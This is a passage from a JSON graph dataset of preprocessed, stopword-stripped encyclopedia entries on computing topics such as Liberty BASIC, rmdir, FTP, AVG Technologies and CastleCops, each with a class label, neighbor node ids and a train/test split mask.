used nearly pc notebook manufacturers primarily offered professional product lines tpm implemented several vendors also hybrid types example tpm integrated ethernet controller thus eliminating need separate motherboard component",
    "neighbors": [
      7936,
      4353,
      7557,
      9863,
      6153,
      5389,
      11405,
      8978,
      1945,
      5918,
      4644,
      1832,
      10153,
      7212,
      1453,
      9390,
      7983,
      8627,
      3382,
      5433,
      6593,
      7106,
      8904,
      7117,
      7377,
      851,
      4820,
      7893,
      91,
      4444,
      2525,
      3422,
      8674,
      2275,
      2788,
      229,
      4067,
      3304,
      2027,
      6509,
      7151,
      2416,
      7794,
      9970,
      6644,
      8439,
      9337,
      3323,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7355,
    "label": 9,
    "text": "Liberty_BASIC:liberty basic liberty basic lb commercial computer programming language integrated development environment ide interpreter developed smalltalk recognizes dialect basic programming language runs 16- 32-bit windows os/2 liberty basic written carl gundel published first release company shoptalk systems 1992 progressed steadily since last published update software june 2018 current version v4.5.1 though liberty basic share limitations design advanced programming provides introductory integrated development environment ide moderate advanced users windows os/2 dlls available current version runs microsoft windows wine linux alpha testing liberty basic v5.0 underway versions run microsoft windows mac os x linux raspberry pi well liberty basic compile native code instead compiles code written ide encrypted file extension tkn file executed exe file carries file name although may change release version 5 liberty basic allows programming style similar dos basics run console mode using default main window displays formatted text accepts user input also supports gui-based event-driven programming using several types windows may contain standard controls buttons menus textboxes etc central idea creating liberty basic model handling windows syntax file handling example liberty basic help file open command opens communication device disk file window dynamic link library serial communications port “ device ” open data also commands control device “ printed ” type device set commands sent way recent versions lb word print may dropped print statement making syntax even simpler simplicity heart liberty basic beginning makes easier learn cost perhaps limiting functionality two data types supported lb4.03 numeric string type declarations required variable sign end name string variable otherwise numeric plan lb5 support types user defined types well purpose making calls api 3rd party dlls struct additional types necessary dll data structure currently supported array arrays one two dimensions supported lb5 may support arrays user-defined types examples language hello world program program display pop-up message box words hello world program display input box running another application using liberty basic printing multiplication table 5 form gnu/liberty basic compiler collection glbcc anthony liguori set tools compile liberty basic programs runs windows linux systems project updated since 2001 2011 alternative windows implementation liberty basic lb booster lbb became available although substantially compatible liberty basic 4 language syntax lbb developed entirely independently richard russell written bbc basic lbb offers typically increased execution speed smaller self-contained executables additional capabilities however lbb 100 compatible lb4 whilst many programs run without modification may need adapted even unsuitable running lbb",
    "neighbors": [
      9345,
      3718,
      1673,
      6154,
      7691,
      1805,
      6797,
      9997,
      786,
      11412,
      4885,
      22,
      3736,
      3481,
      9881,
      797,
      5663,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      7983,
      11315,
      823,
      315,
      7486,
      7870,
      4160,
      4674,
      6338,
      8644,
      8262,
      10750,
      712,
      5833,
      4171,
      8524,
      847,
      1879,
      92,
      11229,
      1632,
      2915,
      9188,
      5733,
      11625,
      8554,
      11243,
      2541,
      8429,
      10478,
      9714,
      5747,
      759,
      6778,
      2045,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 7356,
    "label": 6,
    "text": "Rmdir:rmdir computing codice_1 codice_2 command remove empty directory various operating systems available unix e.g macos solaris aix hp-ux unix-like e.g freebsd linux dos dr flexos ibm os/2 microsoft windows reactos operating systems ms-dos command available versions 2 later dr dos 6.0 also includes implementation command also available open source ms-dos emulator dosbox kolibrios numerical computing environments matlab gnu octave include codice_1 function similar functionality normal usage straightforward name_of_directory corresponds name directory one wishes delete options command -p unix removes parent directories also empty example first remove baz/ bar/ finally foo/ thus removing entire directory tree specified command argument rmdir remove directory empty unix rm command remove directory contents recursively example normal usage identical unix-like operating systems equivalent command ms-dos earlier non-nt-based versions microsoft windows deleting non-empty directories deltree later version windows windows based nt kernel xp vista 7 8 server 2003/2008 case insensitive like earlier predecessors unless two files name different case exist case sensitivity applies selecting file use case match either file one may chosen windows two files named different case sensitivity allowed either windows services unix installed windows registry settings set allow example security risk using rd/rmdir two directories name different case sensitivities exist one contains valid data and/or programs contains incriminating materials and/or malware rd/rmdir gets executed without regard case sensitivity windows chooses legitimate folder delete folder left undesired one windows uses folder instead previously legitimate one execute programs one may led believe contains legitimate data",
    "neighbors": [
      515,
      516,
      9733,
      9735,
      2568,
      521,
      6664,
      8713,
      6674,
      532,
      8729,
      7196,
      2599,
      8236,
      9780,
      5703,
      5706,
      3659,
      2637,
      4174,
      5220,
      8301,
      1647,
      9839,
      8306,
      5759,
      8834,
      5256,
      6281,
      6797,
      4750,
      2198,
      4248,
      6812,
      7326,
      3235,
      4771,
      7847,
      178,
      10428,
      2245,
      1741,
      1750,
      10967,
      9946,
      6369,
      11494,
      4850,
      7411,
      10484,
      8954,
      3323,
      6396,
      8975,
      3856,
      4369,
      5397,
      1304,
      808,
      4398,
      7983,
      10033,
      823,
      1336,
      8504,
      5437,
      7486,
      8517,
      9542,
      8522,
      7515,
      6506,
      1902,
      5492,
      3970,
      10631,
      3976,
      11663,
      4001,
      7088,
      1978,
      960,
      451,
      1987,
      965,
      9166,
      5603,
      8675,
      10727,
      6120,
      491,
      9709,
      2545,
      5106,
      506,
      8692,
      9204,
      11249,
      6138
    ],
    "mask": "Test"
  },
  {
    "node_id": 7357,
    "label": 7,
    "text": "Cloudsoft_Monterey:cloudsoft monterey cloudsoft monterey platform service paas software developed cloudsoft corp provide intelligent application mobility across multiple cloud computing environments supported vcloud amazon ec2 gogrid well private clouds using jclouds cloud api application written java using equinox osgi framework configuration dsls written groovy main components eclipse based development studio tool plugin developers management console monterey management network nodes run mobile application logic",
    "neighbors": [
      4194,
      6307,
      9926,
      5677,
      7983,
      1362,
      823,
      6074
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7358,
    "label": 2,
    "text": "CSI-DOS:csi-dos csi-dos operating system created samara soviet elektronika bk-0011m elektronika bk-0011 microcomputers csi-dos support earlier bk-0010 csi-dos used unique file system supported color graphics video mode system supported hard floppy drives well ram disks computer memory also included software work ay-3-8910 ay-3-8912 music co-processors covox speech thing number games demos designed specially system system also included turbo vision-like application programming interface api allowing simpler design user applications graphical file manager called x-shell",
    "neighbors": [
      9762,
      2179,
      1253,
      5359,
      7983,
      5043,
      1853
    ],
    "mask": "Train"
  },
  {
    "node_id": 7359,
    "label": 3,
    "text": "Data_Transfer_Project:data transfer project data transfer project dtp open-source initiative features data portability multiple online platforms project launched introduced google july 20 2018 currently partnered facebook microsoft twitter apple project formed google data liberation front 2017 hoping provide platform could allow individuals move online data different platforms without need downloading re-uploading data ecosystem achieved extracting different files various available apis released online platforms translating codes could compatible platforms july 20 2018 joint project announced source code uploaded github mainly written google microsoft engineers july 30 2019 apple announced joining project allowing data portability icloud",
    "neighbors": [
      4096,
      8719,
      3600,
      7700,
      9244,
      10284,
      3633,
      8757,
      4683,
      11343,
      3664,
      2130,
      8285,
      2658,
      10338,
      617,
      8821,
      7816,
      6797,
      5262,
      6800,
      11408,
      10900,
      10393,
      8858,
      7841,
      6827,
      1203,
      4289,
      9922,
      196,
      3269,
      1222,
      3782,
      10445,
      10957,
      3795,
      1240,
      8413,
      9949,
      6367,
      236,
      9970,
      7926,
      3836,
      4356,
      5892,
      11524,
      8455,
      11017,
      782,
      10009,
      10525,
      798,
      11549,
      288,
      7970,
      4901,
      1832,
      9518,
      3890,
      5431,
      2875,
      10045,
      11590,
      11592,
      9033,
      10059,
      9039,
      3409,
      11605,
      11103,
      10602,
      5483,
      7548,
      1409,
      4995,
      9610,
      1935,
      5522,
      1427,
      5524,
      10645,
      1435,
      6555,
      3485,
      11164,
      2978,
      1959,
      3499,
      7595,
      5047,
      4044,
      4048,
      5072,
      4051,
      11221,
      6632,
      8681,
      7147,
      5100,
      9712,
      8691
    ],
    "mask": "Test"
  },
  {
    "node_id": 7360,
    "label": 5,
    "text": "Link_Access_Procedure_for_Frame_Relay:link access procedure frame relay wide area network computing link access procedure frame relay lapf part network communications protocol ensures frames error free executed right sequence lapf formally defined international telecommunication union standard q.922 derived ibm synchronous data link control protocol layer 2 protocol ibm systems network architecture developed around 1975 itu used sdlc basis develop lapf frame relay environment along equivalents lapb x.25 protocol stack lapm v.42 protocol lapd isdn protocol stack frame relay local management interface lmi messages carried variant lapf frames lapf corresponds osi model data link layer",
    "neighbors": [
      4546,
      9860,
      1893,
      11332,
      3847,
      4543,
      6544,
      1297,
      5875,
      5118,
      10647,
      7865,
      3323,
      5021,
      2206,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 7361,
    "label": 5,
    "text": "Architecture_for_Control_Networks:architecture control networks architecture control networks acn suite network protocols control entertainment technology equipment particularly used live performance large-scale installations example lighting audio special effects equipment acn maintained entertainment services technology association first official release ansi standard e1.17-2006 entertainment technology architecture control networks standard subsequently revised released ansi e1.17-2010 acn initially designed layered top udp/ip therefore run ip transports including standard inexpensive ethernet 802.11 wi-fi networks acn defines common protocol architecture two major network protocols sdt dmp device description language ddl number ‘ e1.17 profiles interoperability ’ known epi interoperability profiles define elements acn architecture must used particular context achieve interoperability example providing specific values ranges timing parameters used particular network environment breakdown acn sub-protocols interoperability profiles small pieces criticized making acn hard read understand makes architecture highly modular cleanly layered allowed many pieces operated contexts replaced revised without changing pieces example dmp operated tcp well sdt defined initial standard ddl adapted little change describe devices accessed dmx512 ansi e1.31/streaming acn several interoperability profiles seen major revision replacement without disturbing parts standard common architecture specification defines format nested protocol data units pdus rather similar tlv encoding used main protocols defines minimal root layer protocol used splice higher level protocols lower level transport defines root layer protocol using pdu format use udp/ip session data transport sdt reliable multicast transport protocol operates udp/ip used group peers within network sessions deliver messages individually group messages delivery ordered messages may selectively sent reliably unreliably message-by-message basis reliability important data avoiding time resource overhead reliability mechanism beneficial others reliability mechanism also provides online status component detect connection broken sdt provides high degree fine tuning trade-off latency reliability levels resource requirements availability large numbers concurrent sessions means powerful tool grouping managing components whose functions related whose communication requirements similar device management protocol dmp represents device set addressable properties represent current desired state monitoring control controller achieved setting examining values properties avoid inefficiencies polling addition simply reading property values using get-property message dmp provides subscription mechanism whereby device asynchronously send event messages subscribed controllers value property changes dmp expects connections provide reliability set-property event messages form large part operational bandwidth show situation require explicit acknowledgement dmp level e1.17 standard majority systems sdt provides reliability dmp also operated using tcp provide reliable connections size bits representation read/write accessibility function property dmp device determined protocol defines mechanism read and/or write property value instead information must either provided externally device description written ddl limited cases may pre-programmed fore-knowledge specific device types device description language ddl allows machine parsable description interface capabilities device defined description interpreted controller may automatically configure controlling device description provides address property mapping information necessary dmp operate also contain huge amount information functionality capabilities semantics device extensible format allows controller extract features needs specific context skipping information relevant needs ddl xml based language descriptions contained small number xml documents normal acn systems description device may downloaded device however descriptions may also distributed ways internet download since description valid devices type controllers typically maintain cache descriptions devices commonly encounter interoperability profiles epis provided ansi e1.17 initial service discovery system allocation multicast addresses used udp ipv4 udp port allocation multicasting ip address assignment conformant systems protocol timeouts specific environments epis conform acn architecture developed outside ansi e1.17 standard see due modular nature acn easy extend major protocol ansi e1.31 known streaming acn sacn developed organization uses root layer pdu format acn transport data dmx512 data ip networks acn compatible transport number interoperability profiles developed standardized plasa include ansi e1.30-3-2009 time reference acn systems using sntp ntp ansi e1.30-4-2010 defines use ddl describe devices controlled using dmx512 streaming acn early open-source implementation acn released openacn available sourceforge ported wide range platforms limited scope implement ddl support recent much complete implementation c 'acacian includes features ddl support yet another open source acn project codeplex implemented c aims provide full managed code implementation includes code several related protocols e1.31 streaming dmx acn supported linux arm i386 x86-64 macintosh powerpc i386 x86-64 open lighting architecture rust implementation e1.31 found github acn deployed proprietary implementations number companies including use electronic theatre controls etc basis 'net3 branded networked control infrastructure shure inc. control wireless microphones",
    "neighbors": [
      5472,
      514,
      8386,
      9734,
      9127,
      11210,
      5356,
      1197,
      9964,
      6993,
      7889,
      8700,
      11221,
      823,
      11413,
      5469,
      2045,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 7362,
    "label": 4,
    "text": "AVG_Technologies:avg technologies avg technologies cz s.r.o czech security software company headquartered brno founded 1991 jan gritzbach tomáš hofer wholly owned subsidiary avast since 2016 company develops antivirus software internet security services avg antivirus corporate offices europe israel brazil canada united states 2 february 2015 200 million active users used avg software products services include internet security performance optimization personal privacy identity protection applications july 2016 avast announced intended acquire avg acquisition completed 30 september 2016 avast avg operated single company since 3 october 2016 retaining two separate brands company founded brno czech republic jan gritzbach tomáš hofer 1991 grisoft /c/ software spol r. o.. owned jan gritzbach 2001 jan gritzbach decided sell grisoft benson oak capital acquisitions holding company grisoft inc. based wilmington delaware used transaction 2002 company renamed grisoft s.r.o.. three years later benson oak sold 65 share company intel capital enterprise investors us 52 million holding company grisoft holdings b.v. based amsterdam netherlands later grisoft international b.v. gradually became main company 19 april 2006 grisoft acquired german company ewido networks anti-spyware software manufacturer incorporated ewido features new versions avg software 6 november 2006 microsoft announced avg security products would available directly windows security center windows vista since 7 june 2006 avg software also used optional component gfi mailsecurity produced gfi software 5 december 2007 grisoft announced acquisition exploit prevention labs developer linkscanner safe surfing technology 2008 grisoft s.r.o renamed avg technologies cz s.r.o grisoft international b.v. avg technologies n.v.. change made increase effectiveness marketing activities january 2009 avg announced plans acquire sana security finalized plans integrate sana technologies free consumer product avg anti-virus still consideration according jr smith avg chief executive sana security developed technologies currently licensed symantec 5 october 2009 ta associates announced bought minority stake avg technologies us 200 million april 2010 avg announced appointed security industry veteran yuval ben-itzhak senior vice president engineering ben-itzhak became chief technology officer later year 9 june 2010 avg announced acquisition north carolina-based walling data north america security software distribution distributed avg offerings across united states since 2001 10 november 2010 avg announced acquisition tel aviv-based droidsecurity company specializes field mobile security solutions android devices upon completion acquisition droidsecurity become wholly owned subsidiary avg droidsecurity ceo co-founder eran pfeffer become general manager avg ’ mobile solutions team december 2010 avg released mandatory-install update 2011 version antivirus software caused thousands 64 bit windows vista windows 7 computers become completely inoperable avg since released fix attempts repair computers bricked installing update affected users watch following video avg official youtube page resolve issue 28 january 2011 dangerous rogue appeared interface graphics resemble previous version software uses sophisticated social engineering deceive users infect systems malware also portrays so-called emergency mode internet explorer exist genuine application 1 december 2011 avg technologies announced acquisition bsecure technologies inc. bsecure leading provider proprietary cloud-based technology internet filtering industry since 2001 endorsed software provider family online safety 2011 group restructured avg technologies holdings b.v. founded avg technologies cz s.r.o avg technologies n.v. subsidiaries 7 february 2012 avg technologies n.v. listed new york stock exchange 12 june 2013 avg technologies announced acquisition level platforms 8 march 2013 jr smith ceo tendered resignation avg eight years ceo leading company successful ipo nyse delivering eight quarters successive high-growth 30 july 2013 avg technologies announced gary kovacs company new ceo november 2014 avg technologies announced acquisition norman safeground asa oslo-based company known norman suite security products avg technologies announced may 2015 acquisition privax uk based company owner hidemyass vpn service september 2015 company announced acquisition location labs company personal security products four major us cellular carriers 7 july 2016 avast announced intended acquire avg technologies purchase price 25.00 per share cash total around 1.3 billion acquisition completed 30 september 2016 avast avg operate single company monday 3 october 2016 company delisted new york stock exchange 20 august 2010 avg entered partnership moka5 secure desktop virtualisation solutions partnership adds critical security layer virtual desktop marketplace enterprise companies turning desktop virtualization secure solution bringing computer byoc work home initiatives employees 1 july 2010 avg partnered opera software provide malware security web browser opera protection added existing fraud protection technology netcraft phishtank haute secure july 2011 avg joined forces israeli company zbang launch multimi free windows ipad app integrates e-mail social media multimedia one interface avg provides linkscanner app checking link sent e-mail shared social network found via search december 2012 avg yahoo partnered secure search toolbar september 2013 avg partnered facebook launch facebook privacy application avg crowd control may 2012 avg technologies issued copyright claim referred 'takedown request youtube video 1987 pop song never gon na give performed british singer rick astley video october 2015 150 million views 300,000 comments uploaded 2007 restored within 24 hours youtube video name refers internet meme commonly referred 'rickrolling someone pranks others tricking going video avg browser add-on avg secure search criticized adware since frequently bundled software often mistakenly installed exhibits malware-like behavior avg secure search also advertised users free versions avg products although add-on offers legitimate malware-blocking capabilities default behavior changing internet browser default search engine homepage new tab page avg secure search reminiscent potentially unwanted program pup problems uninstalling add-on widely reported add-on could potentially make internet browser vulnerable attacks",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      8584,
      1417,
      7948,
      3981,
      10637,
      9488,
      8980,
      4374,
      10903,
      1052,
      156,
      11166,
      6431,
      2721,
      5924,
      2213,
      422,
      550,
      1318,
      2601,
      6823,
      2859,
      3243,
      6699,
      8614,
      8615,
      9771,
      6834,
      4403,
      9523,
      10166,
      7103,
      704,
      9537,
      10308,
      4421,
      202,
      1355,
      1994,
      5069,
      7886,
      10574,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      3941,
      11622,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      2425,
      9341,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7363,
    "label": 9,
    "text": "Analytica_(software):analytica software analytica visual software package developed lumina decision systems creating analyzing communicating quantitative decision models modeling environment interesting way combines hierarchical influence diagrams visual creation view models intelligent arrays working multidimensional data monte carlo simulation analyzing risk uncertainty optimization including linear nonlinear programming design especially influence diagrams treatment uncertainty based ideas field decision analysis computer language notable combining declarative non-procedural structure referential transparency array abstraction automatic dependency maintenance efficient sequencing computation analytica models organized influence diagrams variables objects appear nodes various shapes diagram connected arrows provide visual representation dependencies analytica influence diagrams may hierarchical single module node diagram represents entire submodel hierarchical influence diagrams analytica serve key organizational tool visual layout influence diagram matches natural human abilities spatially level abstraction people able take far information model structure organization glance possible less visual paradigms spreadsheets mathematical expressions managing structure organization large model significant part modeling process substantially aided visualization influence diagrams influence diagrams also serve tool communication quantitative model created final results computed often case understanding results obtained various assumptions impact results far important specific numbers computed ability target audience understand aspects critical modeling enterprise visual representation influence diagram quickly communicates understanding level abstraction normally appropriate detailed representations mathematical expressions cell formulae detail desired users drill increasing levels detail speeded visual depiction model structure existence easily understandable transparent model supports communication debate within organization effect one primary benefits investing quantitative model building interested parties able understand common model structure debates discussions often focus directly specific assumptions cut cross-talk therefore lead productive interactions within organization influence diagram serves graphical representation help make models accessible people different levels analytica uses index objects track dimensions multidimensional arrays index object name list elements two multidimensional values combined example expression revenue expenses multidimensional analytica repeats profit calculation dimension recognizes dimension occurs values treats dimension calculation process called intelligent array abstraction unlike programming languages inherent ordering dimensions multidimensional array avoids duplicated formulas explicit loops common sources modeling errors simplified expressions made possible intelligent array abstraction allow model accessible interpretable transparent another consequence intelligent array abstraction new dimensions introduced removed existing model without requiring changes model structure changes variable definitions example creating model model builder might assume particular variable example discount_rate contains single number later constructing model user might replace single number table numbers perhaps discount_rate broken country economic_scenario new divisions may reflect fact effective discount rate international divisions company different rates applicable different hypothetical scenarios analytica automatically propagates new dimensions results depend upon discount_rate example result net present value become multidimensional contain new dimensions essence analytica repeats calculation using discount rate possible combination country economic_scenario flexibility important exploring computation tradeoffs level detail computation time available data overall size dimensionality parametric spaces adjustments common models fully constructed way exploring what-if scenarios overall relationships variables incorporating uncertainty model outputs helps provide realistic informative projections uncertain quantities analytica specified using distribution function evaluated distributions sampled using either latin hypercube monte carlo sampling samples propagated computations results sampled result distribution summary statistics viewed directly mean fractile bands probability density function pdf cumulative distribution function cdf analytica supports collaborative decision analysis probability management use sipmath tm standard system dynamics approach simulating behaviour complex systems time deals feedback loops time delays behaviour entire system dynamic function analytica allows definition variables cyclic dependencies feedback loops expands influence diagram notation normally allow cycles least one link cycle includes time lag depicted gray influence arrow distinguish standard black arrows without time lags analytica includes general language operators functions expressing mathematical relationships among variables users define functions libraries extend language analytica several features programming language designed make easy use quantitative modeling visual programming language users view programs models influence diagrams create edit visually adding linking nodes declarative language meaning model declares definition variable without specifying execution sequence required conventional imperative languages analytica determines correct efficient execution sequence using dependency graph referentially transparent functional language execution functions variables side effects i.e changing variables analytica array programming language operations functions generalize work multidimensional arrays analytica used policy analysis business modeling risk analysis areas analytica applied include energy health pharmaceuticals environmental risk emissions policy analysis wildlife management ecology climate change technology defense strategic financial planning r planning portfolio management financial services aerospace manufacturing environmental health impact assessment analytica software runs microsoft windows operating systems three editions professional enterprise optimizer functions cost purchased users interested building models free edition available called analytica free 101 allows build medium moderate sized models 101 user objects.. free 101 also allows view models 101 objects change inputs compute results enables free sharing models review capable non-free power player enables users save inputs utilize database connections analytica cloud player allows share models web lets users access run via web browser recent release analytica version 5.1 released may 2018 analytica predecessor called demos grew research tools policy analysis max henrion phd student later professor carnegie mellon university 1979 1990 henrion founded lumina decision systems 1991 brian arnold lumina continued develop software apply environmental public policy analysis applications lumina first released analytica product 1996",
    "neighbors": [
      2691,
      5380,
      8262,
      6797,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7364,
    "label": 5,
    "text": "File_Transfer_Protocol:file transfer protocol file transfer protocol ftp standard network protocol used transfer computer files client server computer network ftp built client-server model architecture using separate control data connections client server ftp users may authenticate clear-text sign-in protocol normally form username password connect anonymously server configured allow secure transmission protects username password encrypts content ftp often secured ssl/tls ftps replaced ssh file transfer protocol sftp first ftp client applications command-line programs developed operating systems graphical user interfaces still shipped windows unix linux operating systems many ftp clients automation utilities since developed desktops servers mobile devices hardware ftp incorporated productivity applications html editors original specification file transfer protocol written abhay bhushan published 16 april 1971 1980 ftp ran ncp predecessor tcp/ip protocol later replaced tcp/ip version june 1980 october 1985 current specification several proposed standards amend example february 1994 enables firewall-friendly ftp passive mode june 1997 proposes security extensions september 1998 adds support ipv6 defines new type passive mode ftp may run active passive mode determines data connection established cases client creates tcp control connection random usually unprivileged port n ftp server command port 21 modes updated september 1998 support ipv6 changes introduced passive mode time updating extended passive mode server responds control connection three-digit status codes ascii optional text message example 200 200 ok means last command successful numbers represent code response optional text represents human-readable explanation request e.g need account storing file ongoing transfer file data data connection aborted using interrupt message sent control connection transferring data network four data representations used text files different format control record structure options provided features designed facilitate files containing telnet asa data transfer done three modes ftp software also implements deflate-based compressed mode sometimes called mode z command enables mode described internet draft standardized ftp login uses normal username password scheme granting access username sent server using user command password sent using pass command sequence unencrypted wire may vulnerable network sniffing attack information provided client accepted server server send greeting client session commence server supports users may log without providing login credentials server may authorize limited access sessions host provides ftp service may provide anonymous ftp access users typically log service 'anonymous lower-case case-sensitive ftp servers account prompted user name although users commonly asked send email address instead password verification actually performed supplied data many ftp hosts whose purpose provide software updates allow anonymous logins ftp normally transfers data server connect back client port command sent client problematic nats firewalls allow connections internet towards internal hosts nats additional complication representation ip addresses port number port command refer internal host ip address port rather public ip address port nat two approaches solve problem one ftp client ftp server use pasv command causes data connection established ftp client server widely used modern ftp clients another approach nat alter values port command using application-level gateway purpose http essentially fixes bugs ftp made inconvenient use many small ephemeral transfers typical web pages ftp stateful control connection maintains current working directory flags transfer requires secondary connection data transferred passive mode secondary connection client server whereas default active mode connection server client apparent role reversal active mode random port numbers transfers firewalls nat gateways hard time ftp http stateless multiplexes control data single connection client server well-known port numbers trivially passes nat gateways simple firewalls manage setting ftp control connection quite slow due round-trip delays sending required commands awaiting responses customary bring control connection hold open multiple file transfers rather drop re-establish session afresh time contrast http originally dropped connection transfer cheap http subsequently gained ability reuse tcp connection multiple transfers conceptual model still independent requests rather session ftp transferring data connection control connection idle transfer takes long firewall nat may decide control connection dead stop tracking effectively breaking connection confusing download single http connection idle requests normal expected connections dropped time-out common web browsers retrieve files hosted ftp servers although may support protocol extensions ftps ftp—rather http—url supplied accessible contents remote server presented manner similar used web content full-featured ftp client run within firefox form extension called fireftp ftp url syntax described taking form codice_1 bracketed parts optional example url nowiki ftp //public.ftp-servers.example.com/mydirectory/myfile.txt /nowiki represents file myfile.txt directory mydirectory server public.ftp-servers.example.com ftp resource url nowiki ftp //user001 secretpassword private.ftp-servers.example.com/mydirectory/myfile.txt /nowiki adds specification username password must used access resource details specifying username password may found browsers documentation e.g. firefox internet explorer default web browsers use passive pasv mode easily traverses end-user firewalls variation existed different browsers treat path resolution cases non-root home directory user ftp designed secure protocol many security weaknesses may 1999 authors listed vulnerability following problems ftp encrypt traffic transmissions clear text usernames passwords commands data read anyone able perform packet capture sniffing network problem common many internet protocol specifications smtp telnet pop imap designed prior creation encryption mechanisms tls ssl common solutions problem include ftp ssh practice tunneling normal ftp session secure shell connection ftp uses multiple tcp connections unusual tcp/ip protocol still use particularly difficult tunnel ssh many ssh clients attempting set tunnel control channel initial client-to-server connection port 21 protect channel data transferred ftp software either end sets new tcp connections data channels thus confidentiality integrity protection otherwise necessary ssh client software specific knowledge ftp protocol monitor rewrite ftp control channel messages autonomously open new packet forwardings ftp data channels software packages support mode include explicit ftps extension ftp standard allows clients request ftp sessions encrypted done sending auth tls command server option allowing denying connections request tls protocol extension defined implicit ftps outdated standard ftp required use ssl tls connection specified use different ports plain ftp ssh file transfer protocol chronologically second two protocols abbreviated sftp transfers files similar command set users uses secure shell protocol ssh transfer files unlike ftp encrypts commands data preventing passwords sensitive information transmitted openly network interoperate ftp software trivial file transfer protocol tftp simple lock-step ftp allows client get file put file onto remote host one primary uses early stages booting local area network tftp simple implement tftp lacks security advanced features offered robust file transfer protocols file transfer protocol tftp first standardized 1981 current specification protocol found simple file transfer protocol first protocol abbreviated sftp defined proposed unsecured file transfer protocol level complexity intermediate tftp ftp never widely accepted internet assigned historic status ietf runs port 115 often receives initialism sftp command set 11 commands support three types data transmission ascii binary continuous systems word size multiple 8 bits implementation binary continuous protocol also supports login user id password hierarchical folders file management including rename delete upload download download overwrite download append summary ftp reply codes may returned ftp server codes standardized ietf reply code three-digit value first digit used indicate one three possible outcomes — success failure indicate error incomplete reply second digit defines kind error third digit reply code used provide additional detail categories defined second digit",
    "neighbors": [
      10242,
      6154,
      8203,
      8211,
      6171,
      10269,
      10271,
      6177,
      35,
      2085,
      44,
      6189,
      46,
      8238,
      10297,
      2107,
      4158,
      2112,
      4163,
      6212,
      8265,
      4171,
      10325,
      6231,
      8281,
      10341,
      10344,
      106,
      2168,
      152,
      6297,
      2206,
      172,
      2222,
      6318,
      6319,
      10417,
      6330,
      8386,
      6352,
      8401,
      8404,
      4310,
      6364,
      10461,
      4326,
      2281,
      6379,
      8432,
      8443,
      4349,
      4355,
      10503,
      10506,
      6436,
      8487,
      10540,
      6456,
      8504,
      2362,
      2373,
      2375,
      331,
      2387,
      4439,
      10589,
      6498,
      361,
      2409,
      8557,
      367,
      2417,
      10611,
      4470,
      6523,
      6524,
      2430,
      2431,
      2432,
      6531,
      10631,
      8584,
      6541,
      4503,
      2465,
      10659,
      8622,
      6577,
      6579,
      2487,
      8640,
      8644,
      2509,
      471,
      8666,
      8669,
      4574,
      8670,
      10722,
      10723,
      10727,
      494,
      6651,
      10748,
      2558,
      6657,
      2564,
      4620,
      6681,
      6682,
      6689,
      10786,
      10788,
      10791,
      562,
      4661,
      8766,
      6723,
      4687,
      4723,
      2679,
      4729,
      636,
      637,
      8837,
      649,
      10910,
      10924,
      2736,
      4793,
      4797,
      702,
      10950,
      8905,
      2777,
      2797,
      8941,
      751,
      8946,
      8978,
      2841,
      8998,
      823,
      829,
      2887,
      849,
      6993,
      2904,
      4954,
      7003,
      4956,
      865,
      4961,
      7011,
      871,
      11112,
      7031,
      11127,
      891,
      2945,
      9097,
      11147,
      9119,
      9124,
      933,
      7078,
      2983,
      5032,
      5036,
      11184,
      2996,
      5048,
      9144,
      956,
      11196,
      3006,
      5054,
      9151,
      11201,
      11210,
      9167,
      5078,
      988,
      5086,
      5093,
      9193,
      5102,
      1007,
      5113,
      5118,
      9218,
      11269,
      1030,
      1047,
      9245,
      9251,
      1062,
      7208,
      7214,
      9269,
      11319,
      11321,
      3133,
      5181,
      11332,
      3150,
      5202,
      11357,
      3182,
      3191,
      11387,
      5250,
      5251,
      1164,
      11408,
      3218,
      9365,
      11413,
      9380,
      9381,
      1211,
      7364,
      1229,
      1239,
      9437,
      7391,
      9440,
      3297,
      11492,
      11502,
      11509,
      3322,
      11515,
      5373,
      1286,
      5383,
      1297,
      11543,
      5402,
      5405,
      3362,
      9511,
      11571,
      5437,
      5469,
      5470,
      5471,
      5472,
      5474,
      3428,
      5482,
      11633,
      3443,
      5492,
      7546,
      11647,
      11652,
      5516,
      9616,
      7570,
      9625,
      11673,
      5531,
      1436,
      1468,
      9670,
      1491,
      3539,
      5608,
      3564,
      1520,
      3580,
      3592,
      9736,
      1549,
      9743,
      5652,
      9757,
      7713,
      5666,
      9762,
      7718,
      9772,
      1586,
      3639,
      5694,
      1607,
      1618,
      9834,
      3695,
      9843,
      3700,
      5749,
      9844,
      1664,
      9860,
      9868,
      7828,
      3734,
      3742,
      5791,
      3744,
      3750,
      3751,
      3752,
      9905,
      9908,
      9909,
      7865,
      9924,
      9930,
      7885,
      3794,
      5843,
      9939,
      7895,
      9946,
      5875,
      3833,
      7935,
      1792,
      9987,
      3847,
      7943,
      1803,
      1807,
      10005,
      10020,
      7983,
      7984,
      10033,
      7986,
      10035,
      3894,
      3909,
      10057,
      10058,
      8013,
      5968,
      1876,
      1893,
      10088,
      1902,
      10104,
      3961,
      3971,
      10115,
      6028,
      1935,
      1942,
      10144,
      10149,
      6065,
      4024,
      10171,
      10174,
      8132,
      8153,
      10202,
      8169,
      4085,
      6133,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 7365,
    "label": 4,
    "text": "CastleCops:castlecops castlecops volunteer security community focused making internet safer place services public free including malware rootkit cleanup infected computers malware phish investigations terminations searchable database lists malware file hashes targeted spammers throughout existence fought back using legal means defeat education collaborative information sharing among castlecops formerly known computer cops name change 2005 highest priorities achieved training volunteer staff anti-malware phishing rootkit academies additional services including castlecops forums news reviews continuing education castlecops consistently worked industry experts law enforcement reach ultimate goal securing safe smart computing experience everyone online castlecops reached five-year anniversary february 2007 accolades well-known computer security industry pundits players december 24 2008 website announced things come end castlecops ceased exist yet undisclosed reason later reported founder paul laudanski offered job microsoft however domain name remained active ever since albeit content order prevent purchased criminals castlecops malware databases well known security circles already moved systemlookup.com demise site",
    "neighbors": [
      7515,
      9791
    ],
